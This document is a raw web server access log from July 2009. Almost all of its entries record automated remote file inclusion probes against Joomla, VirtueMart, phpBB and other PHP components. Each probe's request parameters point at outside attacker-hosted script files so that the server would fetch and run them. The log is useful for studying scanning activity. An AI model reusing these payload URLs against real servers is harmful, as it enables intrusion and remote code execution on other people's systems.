70.87.217.26 - - [05/Jul/2009:06:23:08 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
70.87.217.26 - - [05/Jul/2009:06:23:08 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
70.87.217.26 - - [05/Jul/2009:06:23:08 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
70.87.217.26 - - [05/Jul/2009:06:23:08 -0700] "GET /logs/access_090325.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
72.10.166.250 - - [05/Jul/2009:06:23:17 -0700] "GET /logs/access_090421.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
122.153.28.140 - - [05/Jul/2009:06:23:47 -0700] "GET /logs/access.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
122.153.28.140 - - [05/Jul/2009:06:25:18 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:06:26:43 -0700] "GET /config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:06:26:44 -0700] "GET /logs/access_090412.log/config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:06:26:48 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:06:28:20 -0700] "GET /logs/access_090509.log/config/dbutil.bck.php?confdir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
114.200.199.144 - - [05/Jul/2009:06:31:22 -0700] "GET /logs/access_090417.log%20%20//?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
114.200.199.144 - - [05/Jul/2009:06:31:23 -0700] "GET /?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.annsfight.org"
114.200.199.144 - - [05/Jul/2009:06:31:23 -0700] "GET /logs//?_zb_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:06:38:31 -0700] "GET /logs/access_090417.log/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:06:38:31 -0700] "GET /atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:06:38:36 -0700] "GET /logs/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:06:38:38 -0700] "GET /logs/access_090503.log/atom.php5?page=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
69.65.41.165 - - [05/Jul/2009:06:59:28 -0700] "GET /logs/access_090417.log/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.annsfight.org"
69.65.41.165 - - [05/Jul/2009:06:59:28 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.annsfight.org"
69.65.41.165 - - [05/Jul/2009:06:59:29 -0700] "GET /logs/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.annsfight.org"
70.32.106.32 - - [05/Jul/2009:07:01:31 -0700] "GET /logs/access_090423.log%20%20//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
70.32.106.32 - - [05/Jul/2009:07:01:31 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
70.32.106.32 - - [05/Jul/2009:07:01:31 -0700] "GET /logs//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
65.98.59.178 - - [05/Jul/2009:07:03:15 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.annsfight.org"
65.98.59.178 - - [05/Jul/2009:07:03:15 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.annsfight.org"
65.98.59.178 - - [05/Jul/2009:07:03:15 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:04:54 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:06:50 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
82.194.87.219 - - [05/Jul/2009:07:09:19 -0700] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:09:22 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
82.194.87.219 - - [05/Jul/2009:07:10:14 -0700] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.annsfight.org"
82.194.87.219 - - [05/Jul/2009:07:11:11 -0700] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.annsfight.org"
82.194.87.219 - - [05/Jul/2009:07:11:50 -0700] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.annsfight.org"
72.10.166.250 - - [05/Jul/2009:07:18:00 -0700] "GET /logs/access_090427.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
72.10.166.250 - - [05/Jul/2009:07:18:00 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
72.10.166.250 - - [05/Jul/2009:07:18:00 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:20:39 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:20:39 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:20:39 -0700] "GET /logs/access_090417.log%20%20//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:20:43 -0700] "GET /logs/access_090429.log%20%20//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:20:45 -0700] "GET /logs/access_090412.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:20:46 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:20:46 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
216.117.128.143 - - [05/Jul/2009:07:31:53 -0700] "GET /logs/access_090503.log%20%20//?_zb_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
119.245.138.143 - - [05/Jul/2009:07:34:50 -0700] "GET /logs/access_090415.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
119.245.138.143 - - [05/Jul/2009:07:34:50 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
119.245.138.143 - - [05/Jul/2009:07:34:50 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
66.11.230.36 - - [05/Jul/2009:07:35:02 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
66.11.230.36 - - [05/Jul/2009:07:35:02 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
66.11.230.36 - - [05/Jul/2009:07:35:02 -0700] "GET /logs/access_090415.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
66.11.230.36 - - [05/Jul/2009:07:35:27 -0700] "GET /logs/access_090412.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:41:49 -0700] "GET /logs/access_090417.log//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:41:49 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:41:49 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:42:07 -0700] "GET /logs/access_090429.log//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
82.194.87.219 - - [05/Jul/2009:07:44:18 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.annsfight.org"
82.194.87.219 - - [05/Jul/2009:07:44:26 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.annsfight.org"
82.194.87.219 - - [05/Jul/2009:07:44:47 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.annsfight.org"
74.223.143.131 - - [05/Jul/2009:07:45:24 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.annsfight.org"
74.223.143.131 - - [05/Jul/2009:07:45:24 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.annsfight.org"
74.223.143.131 - - [05/Jul/2009:07:45:24 -0700] "GET /logs/access_090504.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
74.223.143.131 - - [05/Jul/2009:07:46:17 -0700] "GET /logs/access_090424.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
84.38.65.112 - - [05/Jul/2009:07:46:23 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.annsfight.org"
84.38.65.112 - - [05/Jul/2009:07:46:23 -0700] "GET /logs/access_090504.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
84.38.65.112 - - [05/Jul/2009:07:46:23 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:47:38 -0700] "GET /logs/access_090504.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:47:38 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:47:38 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.annsfight.org"
84.38.65.112 - - [05/Jul/2009:07:47:53 -0700] "GET /logs/access_090424.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:49:11 -0700] "GET /logs/access_090424.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:51:25 -0700] "GET /logs/access_090415.log/?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:51:25 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:51:25 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:51:50 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:51:52 -0700] "GET /logs/access_090504.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:51:53 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:51:53 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:52:00 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:52:01 -0700] "GET /logs/access_090504.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:52:01 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:52:03 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:52:55 -0700] "GET /logs/access_090424.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.51.241.6 - - [05/Jul/2009:07:53:00 -0700] "GET /logs/access_090424.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:53:37 -0700] "GET /logs/access_090420.log/?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:54:18 -0700] "GET /logs/access_090415.log%20/?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:54:26 -0700] "GET /logs/access_090412.log%20/?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:56:29 -0700] "GET /logs/access_090415.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:56:29 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:56:29 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.annsfight.org"
82.194.87.219 - - [05/Jul/2009:07:56:32 -0700] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:57:23 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:57:23 -0700] "GET /logs/access_090415.log%20%20/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:07:57:23 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:58:09 -0700] "GET /logs/access_090415.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:58:10 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.annsfight.org"
84.17.129.100 - - [05/Jul/2009:07:58:10 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.annsfight.org"
89.171.190.110 - - [05/Jul/2009:07:59:03 -0700] "GET /logs/access_090504.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
89.171.190.110 - - [05/Jul/2009:07:59:03 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.annsfight.org"
89.171.190.110 - - [05/Jul/2009:07:59:03 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.annsfight.org"
66.11.230.36 - - [05/Jul/2009:07:59:19 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
66.11.230.36 - - [05/Jul/2009:07:59:19 -0700] "GET /logs/access_090412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
66.11.230.36 - - [05/Jul/2009:07:59:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
66.11.230.36 - - [05/Jul/2009:07:59:19 -0700] "GET /logs/access_090415.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
66.11.230.36 - - [05/Jul/2009:08:00:30 -0700] "GET /logs/access_090412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
66.11.230.36 - - [05/Jul/2009:08:00:30 -0700] "GET /logs/access_090415.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
80.248.208.177 - - [05/Jul/2009:08:01:26 -0700] "GET /logs/access_090420.log%20%20/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
38.103.63.55 - - [05/Jul/2009:08:02:21 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.annsfight.org"
38.103.63.55 - - [05/Jul/2009:08:02:28 -0700] "GET /logs/access_080606.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.annsfight.org"
38.103.63.55 - - [05/Jul/2009:08:02:33 -0700] "GET /logs/access_080811.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.annsfight.org"
38.103.63.55 - - [05/Jul/2009:08:02:39 -0700] "GET /logs/access_080909.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.annsfight.org"
38.103.63.55 - - [05/Jul/2009:08:02:46 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "annsfight.org"